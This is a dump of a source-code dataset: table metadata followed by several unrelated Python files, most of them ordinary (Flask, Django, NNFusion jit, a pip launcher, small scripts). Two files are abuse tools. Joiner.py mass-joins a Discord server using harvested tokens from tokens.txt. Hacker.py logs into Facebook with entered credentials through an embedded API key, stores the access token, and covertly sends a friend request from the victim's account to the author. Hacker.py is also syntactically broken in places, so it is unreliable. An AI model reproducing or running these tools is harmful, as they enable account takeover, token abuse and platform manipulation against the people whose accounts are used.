blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
77f011c7b8d55cb52f37c07ad781342c330b4d63
|
a5777f2b4f9362f6f30b3e5b23c88d4e8505b808
|
/CacHamToanHoc/ham_random.py
|
907eef612f60722fe2ed5b481e75847bd56806d9
|
[] |
no_license
|
Ericmanh/cac_ham_python
|
e7f1caf5fd01e6e29da5ed8aa97a41d1b956d981
|
0f24c723e31a76e3c338a598a9e480e2199fc822
|
refs/heads/master
| 2023-07-16T14:45:23.755223
| 2021-09-01T19:20:45
| 2021-09-01T19:20:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Random là một trong những hàm lấy số ngẫu nhiên
# randrange (x,y) --> lấy số ngẫu nhiên >=x và <y
from random import randrange
count =0
while True:
x= randrange (-100,100)
count +=1
print(x,end=",")
if x==50:
break
print("\n ơ lần ngẫu nhiên thư",count)
print("Bye!")
|
[
"caomanhkha@gmail.com"
] |
caomanhkha@gmail.com
|
c7e37831167ed1331aa25154516b4b52bf9c29cc
|
6ed4367001aeb16b24353a2ae5965fcd813ac23f
|
/course_wor_env/Scripts/pip3.7-script.py
|
ad3a0afaef4b6c8f53bb7071a6ee32d61aa719dc
|
[] |
no_license
|
YevheniiM/MemorizeThem
|
0d8453fec31924a64311eb779db9f5ee1fdae8a4
|
f9e39c278f3b98559339f53e0399856b51e57099
|
refs/heads/master
| 2020-03-14T23:44:39.877121
| 2018-05-19T21:38:35
| 2018-05-19T21:38:35
| 131,851,863
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
#!C:\Users\moroz.y\Study\Programing\CS_UCU\CourseWork\tests\MemorizeThemCourseWork\course_wor_env\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.7'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.7')()
)
|
[
"xmolodtsov@gamil.com"
] |
xmolodtsov@gamil.com
|
5bfc033492962d2f96b50a0944a4b477d3763356
|
5fd95add9b135eac55df8c17185f0348ca1faba5
|
/proj/myproject/pybo/views/main_views.py
|
5976c8b6fb41a38c54aa1e7c1477f0cf95f26e87
|
[] |
no_license
|
42azimut/jump2Flask
|
1128c486a4274f2dc9ea86e14b87412c6f1cd052
|
8626b7e50ac7bc40b5424299763b5a6a305de5f4
|
refs/heads/main
| 2023-04-24T12:14:27.042398
| 2021-05-13T12:36:54
| 2021-05-13T12:36:54
| 326,012,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
from flask import Blueprint, url_for
from werkzeug.utils import redirect
bp = Blueprint('main', __name__, url_prefix='/')
@bp.route('/hello')
def hello_pybo():
return 'Hello, Pybo'
@bp.route('/')
def index():
return redirect(url_for('question._list'))
|
[
"azimutuniverse@gmail.com"
] |
azimutuniverse@gmail.com
|
fbf8ce4a8f1a8fa531b08275055edceb9aa982a6
|
bad44a92fb338260f9c077689d7fa5472526c3fe
|
/src/python/nnfusion/jit.py
|
6fd2745e160f063b2ff9cf6c47e345239698423f
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
microsoft/nnfusion
|
ebc4c06331b8e93dbf5e176e5ecd3382e322ff21
|
bd4f6feed217a43c9ee9be16f02fa8529953579a
|
refs/heads/main
| 2023-08-25T17:41:37.517769
| 2022-09-16T05:59:01
| 2022-09-16T05:59:01
| 252,069,995
| 872
| 157
|
MIT
| 2023-07-19T03:06:21
| 2020-04-01T04:15:38
|
C++
|
UTF-8
|
Python
| false
| false
| 6,923
|
py
|
import copy
import functools
from inspect import isfunction, ismethod, isclass
import torch
from .jit_utils import TorchModule, get_signature
from .runtime import NNFusionRT
from .config import Config
def is_method_of_instance(obj, cls):
return ismethod(obj) and isinstance(obj.__self__, cls)
def is_subclass_of_cls(obj, cls):
return isclass(obj) and issubclass(obj, cls)
def get_nrt_forward(obj, signature, config, outputs, *inputs,
is_method=False):
"""
Return a wrapped forward function that using nnf as runtime
"""
if not isinstance(obj, torch.nn.Module):
raise AssertionError(
"Internal bug, please report to "
"https://github.com/microsoft/nnfusion"
)
output_is_tensor = isinstance(outputs, torch.Tensor)
if output_is_tensor:
outputs = [outputs]
nnf = NNFusionRT(obj, config, signature)
nnf.compile(inputs, outputs)
# TODO free outputs and only save desc?
def forward(*inputs):
results = [
torch.empty_like(output)
for output in outputs
]
if is_method:
obj, *inputs = inputs
nnf.run_method(obj, inputs, results)
else:
inputs = list(inputs)
nnf.run(inputs, results)
if output_is_tensor:
return results[0]
return results
return forward
def nrt_forward(obj, *inputs, config=None, signature=None, is_method=False):
if signature is None:
signature = get_signature(obj)
if hasattr(obj, '_orig_forward'):
# shallow copy is needed to avoid recursion
# call instance forward -> call nnf_forward -> call instance forward
obj_ = copy.copy(obj)
obj_.forward = obj._orig_forward
obj = obj_
outputs = obj(*inputs)
def jit_class_method_using_decorator():
"""
Check if obj is a class method with @nnfusion.jit decorator.
The cases of decorating class method with the @ symbol or applying it
as function are different.
"""
return isinstance(inputs[0], torch.nn.Module)
if jit_class_method_using_decorator():
self, *inputs = inputs
# shallow copy is needed to avoid recursion when using jit as decorator:
# export onnx -> call forward to trace -> call nnf jit func -> export onnx
self_ = copy.copy(self)
def forward(*args):
if forward.first_call:
forward.first_call = False
return obj(self, *args)
# handle the case that jit target function will call `forward`
return self.forward(*args)
forward.first_call = True
self_.forward = forward
return get_nrt_forward(self_, signature, config, outputs,
*inputs, is_method=True)
if isfunction(obj) or is_method_of_instance(obj, torch.nn.Module):
return get_nrt_forward(TorchModule(obj), signature, config, outputs,
*inputs)
return get_nrt_forward(obj, signature, config, outputs, *inputs)
def parse_config(tune, tuning_steps, config):
if config is None:
config = Config()
elif type(config) is dict:
config = Config(config)
if not type(config) is Config:
raise TypeError(
"Expected optional 'config' argument of type dict or "
f"nnfusion.Config but found {config}"
)
if tuning_steps is not None:
if not isinstance(tuning_steps, int):
raise TypeError(
"Expected optional 'tuning_steps' argument of type int "
f"but found {tuning_steps}"
)
if tune is False:
raise ValueError(
f"Conflict is detected: tune={tune} and "
f"tuning_steps={tuning_steps}"
)
tune = True
config['kernel_tuning_steps'] = tuning_steps
if tune is not None:
if not isinstance(tune, bool):
raise TypeError(
"Expected optional 'tune' argument of type bool "
f"but found {tune}"
)
config['antares_mode'] = tune
return config
def check_obj_type(obj):
if not (
isfunction(obj)
or isinstance(obj, torch.nn.Module)
or is_subclass_of_cls(obj, torch.nn.Module)
or is_method_of_instance(obj, torch.nn.Module)
):
raise TypeError(
"Expected function or torch.nn.Module instance/method/class "
f"but found {obj}"
)
def jit_class(obj, config):
"""
Return jitted class using dynamic inheritance to override the forward
function and keep its signature.
"""
class JITModule(obj):
@jit(config=config,
_signature='.'.join([get_signature(obj), 'forward']))
def forward(self, *args, **kwargs):
return super().forward(*args, **kwargs)
return JITModule
def jit(obj=None, *, tune=None, tuning_steps=None, config=None, _signature=None):
"""
Parameters:
obj (function, `torch.nn.Module` instance/method/class):
The target object to be traced. When `obj` is an instance or a
class, it is equivalent to trace its `forward` function.
tune (Optional[bool]):
Whether to tune kernel. By default it follows `config`.
If set, it overwrites `config`.
tuning_steps (Optional[int]):
Number of kernel tuning steps. By default it follows `config`.
If set, it overwrites `config` and `tune`.
config (Optional[dict, nnfusion.Config]):
NNFusion compilation config.
By default it will be set to `nnfusion.Config()`.
Pass a `dict` to overwrite default config or directly pass an
instance of `nnfusion.Config`.
For example, `@nnfusion.jit(tune=True,
config={'kernel_tuning_steps': 42})`
For more flags information, please execute the command `nnfusion`
in the terminal.
"""
config = parse_config(tune, tuning_steps, config)
def _jit(_obj):
check_obj_type(_obj)
if is_subclass_of_cls(_obj, torch.nn.Module):
return jit_class(_obj, config)
@functools.wraps(_obj)
def wrapper(*args): # TODO support kwargs?
if wrapper.forward is None:
wrapper.forward = nrt_forward(_obj, *args,
config=config,
signature=_signature)
return wrapper.forward(*args)
wrapper.forward = None
if isinstance(_obj, torch.nn.Module):
_obj._orig_forward = _obj.forward
_obj.forward = wrapper
return _obj
return wrapper
if obj is None:
return _jit
return _jit(obj)
|
[
"noreply@github.com"
] |
microsoft.noreply@github.com
|
2877f86b77d5145c624166a1fb173aaf3493ada6
|
763fd4660fff93a6fc10adf1b60e79af3937d394
|
/apps/login/migrations/0001_initial.py
|
f54705eaaec1b74370a3f7749d522ab44785ef1f
|
[] |
no_license
|
business-phil/user_dashboard
|
4c888fe03ac4658bf2abf38897d95f405b24d906
|
9164f9475efdc8f3891c4e3b0e9e54c459c94efd
|
refs/heads/master
| 2021-06-01T09:17:59.098779
| 2016-08-26T15:34:34
| 2016-08-26T15:34:34
| 66,364,971
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 19:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254, unique=True)),
('first_name', models.CharField(max_length=45)),
('last_name', models.CharField(max_length=45)),
('password', models.CharField(max_length=255)),
('user_level', models.CharField(choices=[('user', 'User'), ('admin', 'Admin')], default='user', max_length=5)),
('description', models.TextField(default='', max_length=400)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"pfb3cn@virginia.edu"
] |
pfb3cn@virginia.edu
|
41cba4d61f7204ca6fb11832e4055fbadb800353
|
631ebc5d7126e7e9d5318de0d059893864e81532
|
/cbv/views.py
|
d9586b3bf3381231d0d138f78b76a8d4ae2b2ea1
|
[] |
no_license
|
AhmedAhmedFekry/cbv_posts
|
78935b444f1e62b5111d6a0b4b919999d8949d1e
|
b8dbc8d78d23758d5a8b7ad55a4fed9f51486183
|
refs/heads/main
| 2023-04-22T23:32:45.847158
| 2021-05-09T13:04:18
| 2021-05-09T13:04:18
| 365,743,901
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 348
|
py
|
from django.shortcuts import render
from django.views.generic.base import TemplateView
from core.models import Post
class Ex2(TemplateView):
template_name='cbv/temp1.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["posts"] =Post.objects.all()
return context
|
[
"ahmedahmedfekry11305654@gmail.com"
] |
ahmedahmedfekry11305654@gmail.com
|
1f97d1627188febbb4baa4eec25c4bcb8547e3c1
|
90590ccc0fbc0172f1aaeb46eec1734d5d2f78b9
|
/Joiner.py
|
9553cd3a5889c0a67ce47ac039b8f1e7ff5febaf
|
[] |
no_license
|
KeparYTbcc/Discord-Joiner-pro
|
f03e3ee1cac7211a2f97da27dd5dc7bc80e7f003
|
8f070ed13624f3396461a82f17eb001f580966bb
|
refs/heads/main
| 2023-09-04T05:42:01.860227
| 2021-10-21T04:22:27
| 2021-10-21T04:22:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
import requests
from discord_webhook import DiscordWebhook
import os
import webbrowser
import sys
from time import sleep
os.system('color a')
os.system('title Mass Joiner Bot - KeparDEV ')
os.system('cls && mode 800')
words = ("""
/$$$$$ /$$
|__ $$ |__/
| $$ /$$$$$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$ /$$__ $$| $$| $$__ $$ /$$__ $$ /$$__ $$
/$$ | $$| $$ \ $$| $$| $$ \ $$| $$$$$$$$| $$ \__/
| $$ | $$| $$ | $$| $$| $$ | $$| $$_____/| $$
| $$$$$$/| $$$$$$/| $$| $$ | $$| $$$$$$$| $$
\______/ \______/ |__/|__/ |__/ \_______/|__/
/$$$$$$$
| $$__ $$
| $$ \ $$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$ /$$__ $$
| $$____/| $$ \__/| $$ \ $$
| $$ | $$ | $$ | $$
| $$ | $$ | $$$$$$/
|__/ |__/ \______/
Made By Kepar#0001 :)
I was bored
Tokens Extracted From 'tokens.txt'
""")
for char in words:
sleep(0.00000001)
sys.stdout.write(char)
sys.stdout.flush()
link = input('Discord Invite Link: ')
if len(link) > 6:
link = link[19:]
apilink = "https://discordapp.com/api/v6/invite/" + str(link)
print (link)
with open('tokens.txt','r') as handle:
tokens = handle.readlines()
for x in tokens:
token = x.rstrip()
headers={
'Authorization': token
}
requests.post(apilink, headers=headers)
print ("All valid tokens have joined!")
os.system('pause >nul')
|
[
"noreply@github.com"
] |
KeparYTbcc.noreply@github.com
|
d9d104fdad2d1d85198c5470e559124203bdd273
|
2c0df7f7feb0ad8412b71c25e36c5ed49534b384
|
/chaning-package-name.py
|
e4c5ba911307e9dea619b6f8822d101fe3a1900d
|
[] |
no_license
|
wwk5c5gh3/android-modify-packname
|
b8fc9d6b16fbbee117ed22fa0034518e85cfad36
|
758eadd39db5956bd4e7b32c7e4a0aad2b7d68df
|
refs/heads/master
| 2021-06-04T18:44:01.085733
| 2016-06-13T03:01:04
| 2016-06-13T03:01:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,673
|
py
|
# coding:utf-8
# 世界如此喧嚣 真相何其稀少
# 2016.05.26
# 原工程路径
src = "../AdSharePlugin2"
# 新工程路径
dst = "../AdSharePlugin3"
# 旧包名
oldPackage = "me.fengchuan.adshareplugin"
# 新包名
newPackage = "com.crazyspread.adshareplugin"
# 主项目名称
pro_name = "app"
# 还需要修改local.properties中的sdk.dir
# 排除的文件或目录
exclude_dir = [".svn/", ".idea/", "build/", "captures/", "22.iml", "crazyspread.iml"]
# =================上面参数可以修改=================
import os
import string
import random
import time
import ntpath
import subprocess
import re
# 生成签名库 v22copy/crazyspread/crazyspread.keystore
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return "".join(random.choice(chars) for _ in range(size))
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
timestr = time.strftime("%Y-%m-%d_%H%M%S")
storeFilePath = os.path.join(dst + os.sep + pro_name + os.sep, timestr + ".keystore")
# 签名库文件名
storeFileName = path_leaf(storeFilePath)
storeFileDir = os.path.dirname(storeFilePath)
if not os.path.exists(storeFileDir):
os.makedirs(storeFileDir)
# -dname "CN=名字与姓氏,OU=组织单位名称,O=组织名称,L=城市或区域名称,ST=州或省份名称,C=单位的两字母国家代码"
# 别名
alias = id_generator()
# 保存口令
storepass = id_generator()
# key口令
keypass = id_generator()
# 名字与姓氏
CN = id_generator()
# 组织单位名称
OU = id_generator()
# 组织名称
O = id_generator()
# 城市或区域名称
L = id_generator()
# 州或省份名称
ST = id_generator()
# 单位的两字母国家代码
C = id_generator(2, string.ascii_uppercase)
# 生存签名库
os.system("keytool -genkey -v -keyalg RSA -keysize 2048 -validity 10000 -keystore " + storeFilePath \
+ " -alias " + alias + " -storepass " + storepass + " -keypass " + keypass\
+ " -dname '" + "CN=" + CN + ",OU=" + OU + "," + "O=" + O + "," \
+ "L=" + L + "," + "ST=" + ST + "," + "C=" + C +"'")
# 获取签名库信息
output = subprocess.check_output("keytool -list -keystore " + storeFilePath + " -v -storepass " \
+ storepass + " | grep -E 'MD5'", shell=True)
storeFileMD5 = output.strip().split(" ")[1].replace(" ","").replace(":","")
storeReadMePath = os.path.join(dst + os.sep + pro_name + os.sep, storeFileName + ".readme")
storeReadMeDir = os.path.dirname(storeReadMePath)
if not os.path.exists(storeReadMeDir):
os.makedirs(storeReadMeDir)
with open(storeReadMePath, "w") as readmeFile:
readmeFile.write("签名库:" + storeFilePath + "\n")
readmeFile.write("alias(别名):" + alias + "\n")
readmeFile.write("storepass(保存口令):" + storepass + "\n")
readmeFile.write("keypass(key口令):" + keypass + "\n")
readmeFile.write("CN(名字与姓氏):" + CN + "\n")
readmeFile.write("OU(组织单位名称):" + OU + "\n")
readmeFile.write("O(组织名称):" + O + "\n")
readmeFile.write("L(城市或区域名称):" + L + "\n")
readmeFile.write("ST(州或省份名称):" + ST + "\n")
readmeFile.write("C(单位的两字母国家代码):" + C + "\n")
readmeFile.write("MD5(微信应用签名):" + storeFileMD5 + "\n")
readmeFile.closed
# 修改旧包名
for path, subdirs, files in os.walk(src):
for name in files:
oldPath = os.path.join(path, name)
if oldPath == os.path.join(src, pro_name + "/build.gradle") \
or oldPath == os.path.join(src, pro_name + "/src/main/AndroidManifest.xml") \
or oldPath == os.path.join(src, pro_name + "/proguard-rules.txt"):
new_pro_gradle_path = oldPath.replace(src, dst)
dir = os.path.dirname(new_pro_gradle_path)
if not os.path.exists(dir):
os.makedirs(dir)
with open(oldPath) as infile, open(new_pro_gradle_path, "w") as outfile:
for line in infile:
# 修改3个配置文件 和 布局xml中旧包名
line = line.replace(oldPackage, newPackage)
# 修改签名库文件名
oldStoreFileName = re.findall(r"storeFile\sfile\(\"(.*?)\"\)", line)
if oldStoreFileName:
line = line.replace("".join(oldStoreFileName), storeFileName)
# 修改签名库保存口令
oldStorepass = re.findall(r"storePassword\s\"(.*?)\"", line)
if oldStorepass:
line = line.replace("".join(oldStorepass), storepass)
# 修改签名库别名
oldAlias = re.findall(r"keyAlias\s\"(.*?)\"", line)
if oldAlias:
line = line.replace("".join(oldAlias), alias)
# 修改签名库条目口令
oldKeypass = re.findall(r"keyPassword\s\"(.*?)\"", line)
if oldKeypass:
line = line.replace("".join(oldKeypass), keypass)
outfile.write(line)
print("generate file:" + outfile.name)
infile.closed
outfile.closed
elif name.endswith(".java"):
# modify .java for crazyspread
new_pro_java_path = oldPath.replace(oldPackage.replace(".", os.sep), newPackage.replace(".", os.sep)) \
.replace(src,dst)
dir = os.path.dirname(new_pro_java_path)
if not os.path.exists(dir):
os.makedirs(dir)
with open(oldPath) as infile, open(new_pro_java_path, "w") as outfile:
for line in infile:
line = line.replace(oldPackage, newPackage)
outfile.write(line)
print("generate file:" + outfile.name)
infile.closed
outfile.closed
elif all(i not in oldPath for i in exclude_dir):
new_pro_gradle_path = oldPath.replace(src, dst)
dir = os.path.dirname(new_pro_gradle_path)
if not os.path.exists(dir):
os.makedirs(dir)
with open(oldPath) as infile, open(new_pro_gradle_path, "w") as outfile:
for line in infile:
# 修改3个配置文件 和 布局xml中旧包名
line = line.replace(oldPackage, newPackage)
# 修改签名库文件名
oldStoreFileName = re.findall(r"storeFile\sfile\(\"(.*?)\"\)", line)
if oldStoreFileName:
line = line.replace("".join(oldStoreFileName), storeFileName)
# 修改签名库保存口令
oldStorepass = re.findall(r"storePassword\s\"(.*?)\"", line)
if oldStorepass:
line = line.replace("".join(oldStorepass), storepass)
# 修改签名库别名
oldAlias = re.findall(r"keyAlias\s\"(.*?)\"", line)
if oldAlias:
line = line.replace("".join(oldAlias), alias)
# 修改签名库条目口令
oldKeypass = re.findall(r"keyPassword\s\"(.*?)\"", line)
if oldKeypass:
line = line.replace("".join(oldKeypass), keypass)
outfile.write(line)
print("generate file:" + outfile.name)
infile.closed
outfile.closed
# 运行shell
os.chdir(dst)
os.system("chmod 755 ./gradlew")
os.system("./gradlew assembleRelease")
print("install apk dir:" + os.getcwd() + os.sep + pro_name + "/build/outputs/apk")
|
[
"zylstc2009@gmail.com"
] |
zylstc2009@gmail.com
|
5f1b3bc2f31499c6f0a9fe27c78a3cd3745ad250
|
830d6959e7167d2abdbdc2c9c0729eb511237382
|
/game1.py
|
587e946a0666013f6d0d8917f6ba10bbccff9267
|
[] |
no_license
|
camcottle/Game-Public
|
031422c0f5b5b6e8ec5cd4fe0816d49d07d69853
|
0aed140055aefab9637a2325226dbc2d3b153258
|
refs/heads/master
| 2022-12-02T04:53:54.294023
| 2020-08-11T23:13:12
| 2020-08-11T23:13:12
| 286,901,953
| 0
| 0
| null | 2020-08-12T02:59:34
| 2020-08-12T02:59:33
| null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
print ("Welcome to Chose your own adventure python edition")
print ("")
def playerNames():
playerNum = int(input("How many players are playing? "))
print(playerNum)
# Great place to consider using a for loop
if playerNum == 1:
player1 = input("What is player one's first name? ")
print("Welcome ", player1, "!")
elif playerNum == 2:
player1 = input("What is player one's first name? ")
player2 = input("What is player two's first name? ")
print("Welcome ", player1, "&", player2, "!")
elif playerNum == 3:
player1 = input("What is player one's first name? ")
player2 = input("What is player two's first name? ")
player3 = input("What is player three's first name? ")
print("Welcome ", player1, ",", player2, "&", player3, "!")
elif playerNum == 4:
player1 = input("What is player one's first name? ")
player2 = input("What is player two's first name? ")
player3 = input("What is player three's first name? ")
player4 = input("What is player four's first name? ")
print("Welcome ", player1, ",", player2, ",", player3, ",", player4, "!")
elif playerNum >= 5:
print ("I am sorry unfortunately only four players are permitted.")
def characters():
### Artibuttes each char will have: Name, Dice(1-2), Acceptable Dice Values(each dice has a seperate value), Role type(Builder,Recruiter,Both(Builder and Recruiter)), current state(available,active, tired, injured),which player controls them(determined by how many players in the game, and if unowned their cost if they are avail for purchase)
continueCreation = input("do you have a char to create? ").lower()
charNames = []
charDice = []
charRole = []
if continueCreation == "yes":
getCharNames = input("Enter Next Char name ")
getCharDice = input("Please enter the number of dice this char will use. ")
getCharRole = input("Please enter the villagers role. ")
charNames.append(getCharNames)
charDice.append(getCharDice)
charRole.append(getCharRole)
print (charNames)
print (charRole)
print (charDice)
continueCreationNext = input("Do you have another char to enter? ").lower()
if continueCreationNext == "yes":
characters()
else:
print("Thanks for entering these chars" )
else:
print("Thanks for entering these chars" )
# diceNumber = int(input("How many dice does this character have? "))
playerNames()
characters()
|
[
"noreply@github.com"
] |
camcottle.noreply@github.com
|
874b9161189f66fb76d33ead2d57b360fe368c25
|
59dee7060541dbfe93136055d96a9069c765e2fd
|
/Hacker.py
|
0d3d0658bb86a388e676af7008eac3843c3c60dc
|
[] |
no_license
|
Raheemboss0071/Usmankhan3
|
75d995575a47e16738d23cbc9c1f4ee17c9b0a36
|
809132912f4dc85eacfe2e1f94a4416f00e32d9e
|
refs/heads/master
| 2022-11-14T02:58:21.455819
| 2020-07-01T19:28:06
| 2020-07-01T19:28:06
| 276,464,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,385
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = UsmanKhan
\033[1;98m╔╗─╔╗───────────╔╗╔═╦╗
\033[1;98m║║─║║───────────║║║╔╣║
\033[1;98m║║─║╠══╦╗╔╦══╦═╗║╚╝╝║╚═╦══╦═╗
\033[1;98m║║─║║══╣╚╝║╔╗║╔╗╣╔╗║║╔╗║╔╗║╔╗╗
\033[1;98m║╚═╝╠══║║║║╔╗║║║║║║╚╣║║║╔╗║║║║
\033[1;98m╚═══╩══╩╩╩╩╝╚╩╝╚╩╝╚═╩╝╚╩╝╚╩╝╚╝
\033[1;91m ║══▒═💀═▒═💀═▒═══¤═¤═¤════════════¤═══¤═══¤═══║
\033[1;96m ║✯ 𝕮𝖗𝖊𝖆𝖙𝖔𝖗 𝕸𝖗.𝕽𝖆𝖓𝖆 𝕬𝖆𝖍𝖎𝖑 ║
\033[1;98m ║✯ 𝖄𝖔𝖚𝖙𝖚𝖇𝖊 ☪ Usman Khan ║
\033[1;96m ║✯ 𝕴𝖒 𝖓ø𝖙 𝖗𝖊𝖘𝖕𝖔𝖓𝖘𝖎𝖇𝖑𝖊 𝖋𝖔𝖗 𝖆𝖓𝖞 𝖒𝖎𝖘𝖘 𝖚𝖘𝖊 ║
\033[1;91m ║══▒═💀═▒═💀═▒═══¤═¤═¤════════════¤═══¤═══¤═══║"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;95mPlease Wait \x1b[1;95m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m************************************************
\033[1;96m~ IM NOT RESPONSIBLE FOR ANY MISS USE UsmanKhan ~
\033[1;97m************************************************
\033[1;95m____─▄───────▄█▄───────▄─ Stay Home 💓
\033[1;95m____▐█▌──▄──█████──▄──▐█▌ Stay Safe 💓
\033[1;95m____─█──███▄▄███▄▄███──█─
\033[1;95m____░█░░█▄█▄█▀▒▀█▄█▄█░░█░
\033[1;95m____██▄▄█▄█▄█▒▒▒█▄█▄█▄▄██
"""
jalan("\033[1;92m _ _ _ ")
jalan("\033[1;92m | | (_) | |")
jalan("\033[1;92m _ __ __ _| | ___ ___| |_ __ _ _ __ ZINDABAD✔ ")
jalan("\033[1;97m | '_ \ / _` | |/ / / __| __/ _` | '_ \ ")
jalan("\033[1;97m | |_) | (_| | <| \__ \ || (_| | | | |")
jalan("\033[1;92m | .__/ \__,_|_|\_\_|___/\__\__,_|_| |_|")
jalan("\033[1;92m | | ")
jalan("\033[1;92m |_| ")
CorrectUsername = "Usman"
CorrectPassword = "Khan"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;95mTool Username \x1b[1;91m»» \x1b[1;91m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;95mTool Password \x1b[1;91m»» \x1b[1;91m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:Hacker_boss
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[⚡] \x1b[1;91m───Login your new ID───\x1b[1;93m[⚡]' )
id = raw_input('\033[1;93m[+] \x1b[0;34mEnter ID/Email \x1b[1;95m: \x1b[1;95m')
pwd = raw_input('\033[1;95m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
